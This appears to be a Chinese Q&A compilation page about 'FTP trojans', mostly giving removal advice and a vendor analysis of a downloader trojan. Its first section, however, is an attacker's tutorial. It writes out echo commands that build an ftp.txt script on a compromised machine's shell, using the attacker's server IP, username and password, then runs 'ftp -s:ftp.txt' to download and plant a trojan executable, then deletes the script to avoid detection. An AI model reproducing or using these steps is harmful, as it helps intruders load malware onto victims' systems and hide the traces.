㈠ 怎样把木马上传到FTP服务器里
有的时候我们自己的计算机没有公网IP地址,这个时候想用TFTO就比较麻烦了,如果你嫌上面的办法比较麻烦的话,那你还可以用这个比较简单的办法就是用FTP,但是我们在得到的SHELL里不能直接登陆我们的FTP服务器去下载东西,这涉及到一些FTP协议的问题,在这里就不详述了,我们只是讨论怎么传文件嘛!当我们不能直接传的时候我们可以换个办法来实现,这个办法就是写个<A
href="ftp://ftp.txt">ftp.txt的文件来向FTP服务器提交就可以了。在我们得到的肉鸡的SHELL里写入以下代码:
echo
ftp >ftp.txt
echo open服务器ip [端口]>>ftp.txt
echo
username>>ftp.txt
echo password>>ftp.txt
echo get
sample.exe>>ftp.txt
echo
bye>>ftp.txt
其中服务器ip就是你放你想传的文件的FTP的服务器
IP地址;username就是你登陆你的FTP的帐号;password就是你的密码;sample.exe就是你想下载的程序名字。最后一个bye是退出FTP服务器。
其中218.XXX.XX.163
就是我的FTP服务器的IP地址,iceskysl就是我的用户名,653917就是我的密码;mt.exe就是我想下载的文件。我们DIR下看看写成功这个<A
href="ftp://ftp.txt">ftp.txt么?
为了确保我们没有写错,最好还是用TYPE命令来看看这个 <A
href="ftp://ftp.TXT">FTP.TXT文件的内容是不是我们想写进去的,一般来说是不会错的!接着执行ftp -s:ftp.txt
就可以下载到们的那个文件了,我这里下载的就是MT.exe这个文件,显示的就是我成功下载的提示了。
记得最后要用del <A
href="ftp://ftp.txt">ftp.txt来删掉我们写的这个TXT文件,要不被发现了我们就亏大了!现在这个文件就传上去了,接着怎么做就不要我教你了吧!
㈡ ftpPOPO木马怎么杀
ftpPOPO木马怎么杀?
杀毒软件一般处理不了木马
木马应该使用木马专杀工具来清理
1.推荐免费的、汉化的AVG
Anti-Spyware
7.5.1.43
http://www.tmxy.net/qt/avg.htm
他的数据库中的特征码数量是1104118
2.Windows清理助手
http://www.tmxy.net/xt/arswp.htm
3.a-squared
Free
V3.0
中文版
http://www.tmxy.net/qt/a-squared.htm
可以查杀1226523种木马、后门、蠕虫、拨号器、间谍软件和广告软件
这些都是绿色软件
不需要安装
不随系统启动
与任何杀毒软件都没有冲突
㈢ 怎么删除ftp的木马代码
如果是文件的话 用杀毒软件去删除吧
直接针对文件杀毒
一般木马中毒都是通过下载软件,浏览未知网页
Trojan一词的特洛伊木马本意是特洛伊的,指特洛伊木马,是木马计的故事
木马会盗取你的账号,信息等资料
如果电脑中了木马建议尽快杀毒以免造成系统问题
可以先做一次全盘杀毒
然后针对性的:
【腾讯电脑管家】--工具箱--【木马克星】 (针对于杀了又出现的顽固病毒)
最后开启实时防毒保护。
㈣ ftppopo木马
首先升级杀毒软件至最新病毒库,清除临时文件,关闭“系统还原”,重启电脑,进入“安全模式”下杀毒即可。
㈤ ftpPOPO木马 怎么清除啊
先找到安装路径然后进安全模式杀掉,删除其安装目录,搜索注册表收到的全删,搜全盘搜到全删重启就可以了
㈥ 什么是FTP木马
木马下载者 Trojan-Downloader.Win32.QQHelper.ftp
病毒名称
Trojan-Downloader.Win32.QQHelper.ftp
捕获时间
2007年9月9日
病毒症状
该木马程序是一个用Delphi语言编写的木马,长度127,488 字节,无装饰性图标,发作后将自身和释放的库文件Vermin.dll插入explorer.exe及其子进程,在后台下载其他木马程序。
病毒分析
该木马是一个比较顽固的木马程序,触发后会拷贝自身文件到系统目录的inf文件夹下执行,并将其注册为服务名为"Windows Media Service"的系统服务以获得系统权限,服务描述"管理多媒体设备,如果服务被终止,音频设备及其音效将不能正常工作。如果此服务被禁用,任何依它的服务将无法启动";释放Vermin.dll监控系统消息;通过调试手段将自身映像和Vermin.dll模块注入到explorer.exe及其所有子进程中,在后台调用相关下载函数下载其他木马程序;通过查找窗口以及窗口类的方式获取某些安全软件的进程,尝试强行终止安全软件进程或通过发送消息强行关闭其窗口;使用IFEO映像劫持系统文件ctfmon.exe(即Windows任务栏的语言栏工具条)到病毒映像路径,使得木马会在开机时自动启动。
感染对象
Windows2000/Windows XP/Windows2003
传播途径
文件捆绑/网页木马传播
安全提示
已安装微点主动防御软件的用户,无论您是否已经升级到最新版本,微点主动防御都能够有效防御该木马程序。如果您没有将微点主动防御软件升级到最新版,微点主动防御软件在发现该病毒后将报警提示您“发现未知木马”,请直接选择删除处理(如图1);
如果您已经将微点主动防御软件升级到最新版本,微点将报警提示您发现Trojan-Downloader.Win32.QQHelper.ftp”,请直接选择删除(如图2)。
使用其它杀毒软件的用户,请尽快将您的杀毒软件特征库升级到最新版本进行查杀,并开启防火墙拦截网络异常访问,如依然有异常情况请注意及时与专业的安全软件厂商联系获取技术支持。由于该病毒的特殊性,会自动终止某些杀毒软件运行,如果您的杀毒软件已经无法正常运行,您也可以尝试安装微点解决。
没有安装微点主动防御软件的用户,建议您尽快安装使用微点主动防御软件查杀预防各类新病毒。
㈦ FTPPOPO木马怎么杀
FTPPOPO木马怎么杀????
杀毒软件一般处理不了木马
木马应该使用木马专杀工具来清理
1.推荐免费的、汉化的AVG
Anti-Spyware
7.5.1.43
http://www.tmxy.net/qt/avg.htm
他的数据库中的特征码数量是1110723
2.Windows清理助手
http://www.tmxy.net/xt/arswp.htm
3.a-squared
Free
V3.0
中文版
http://www.tmxy.net/qt/a-squared.htm
可以查杀1245136种木马、后门、蠕虫、拨号器、间谍软件和广告软件
这些都是绿色软件
不需要安装
不随系统启动
与任何杀毒软件都没有冲突
㈧ 360老是弹出ftp木马
使用金山网盾,网络搜索金山网盾,打开点击一键修复,清理掉正在运行的病毒进程。然后点击"免费杀毒",安装金山毒霸2011后全盘彻底杀毒
注意,360会拦截金山网盾安装,如果你有360,请先打开360木马防火墙,点击进程防火墙的已开启按钮暂时关闭
(如发现网盾不能扫描,请在任务栏右键退出360的托盘)
㈨ FTP木马 是什么
这个木马最讨厌的地方在于,杀掉还会再生。木马原始文件好像还没有人找到。但是可以使用免疫的方法废掉它的武功。
病毒文件在windows/help文件夹里生成.bat.vbshelp.dll(或许文件名称会有不同)请用记事本打开这些文件,讲里面的东西删光,再保存。或者删除文件再用记事本新建同名同扩展名的空文件。然后文件属性改成只读。OK!这样它再也不能发作了。
这招基本对所有会再生的病毒和木马都有效!~
******************************************************************
大家中的不一样,所以文件名不同是正常的,这几个文件的作用就是从指定网站下载大量病毒和木马。很多新病毒木马都是用的这样的方法,不过文件和存放位置不同,大家要仔细找找,*.bat这个文件是判断你的机子里有没有他们的病毒,没有就调用help.dll和ftp从help.dll指定的网站下载主要的病毒体。自己要找到这几个文件,做成空文件代替,用360检查还有,但是那已经是你做的空文件了,没有任何危害你的能力了。
这几个文件通常会在c盘根目录下,windows下windows/help下和system32下,自己好好找找,help.dll和*.vbs可以用记事本打开,*.bat可以直接右键编辑,里面的内容字要懂点英文很容易看懂
㈩ 求助:ftp木马怎么杀
那就先下载个SREng扫个日志传上来看看能不能找点线索